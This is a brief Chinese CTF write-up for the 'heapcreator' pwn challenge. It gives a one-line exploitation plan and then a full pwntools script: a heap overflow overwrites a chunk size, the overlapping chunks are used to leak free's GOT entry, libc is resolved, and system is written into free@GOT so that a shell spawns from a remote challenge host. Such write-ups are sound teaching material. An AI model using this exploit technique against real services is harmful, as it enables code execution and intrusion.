pwn-heapcreator(堆溢出+got表劫持)

思路：
添加0,1,2trunk->编辑0写入/bin/sh\x00和覆盖1的size为1+2（0x81）->free1->把0x70大小的trunk申请回来->编辑1修改trunk2的索引的堆地址为free_got->show(2)泄露free_got地址->计算libc基地址->编辑2将system地址写入，就是把system地址写入free_got的fd中->调用free(0)->system("/binsh")->shell

from pwn import *
from LibcSearcher import *


def conn():
    global r, Libc, elf
    #r = process("./heapcreator")
    Libc = ELF("./libc-2.23.so")
    r = remote("1.95.36.136", 2113)
    elf = ELF("./heapcreator")


def add(x, y):
    r.sendlineafter(b"choice :", b"1")
    r.sendlineafter(b"Size of Heap : ", str(x).encode())
    r.sendlineafter(b"Content of heap:", y)


def edit(x, y):
    r.sendlineafter(b"choice :", b"2")
    r.sendlineafter(b"Index :", str(x).encode())
    r.sendlineafter(b"Content of heap : ", y)


def free(x):
    r.sendlineafter(b"choice :", b"4")
    r.sendlineafter(b"Index :", str(x).encode())


def show(x):
    r.sendlineafter(b"choice :", b"3")
    r.sendlineafter(b"Index :", str(x).encode())


def pwn():
    heap = 0x6020A0
    add(0x18,b'aaa')
    add(0x10,b'aaa')
    add(0x10,b'aaa')
    payload = b"/bin/sh\x00"+b'a'*0x10+b'\x81'
    edit(0,payload)
    free(1)
    free_ = elf.got["free"]
    print("free_got>>>",hex(free_))
    add(0x70,p64(0)*8+p64(0x8)+p64(free_))
    show(2)
    free_addr = u64(r.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
    print("free>>>",hex(free_addr))
    libc = free_addr - Libc.sym["free"]
    sys = libc + Libc.sym["system"]
    edit(2,p64(sys))
    free(0)
    #gdb.attach(r)
    r.interactive()


conn()
pwn()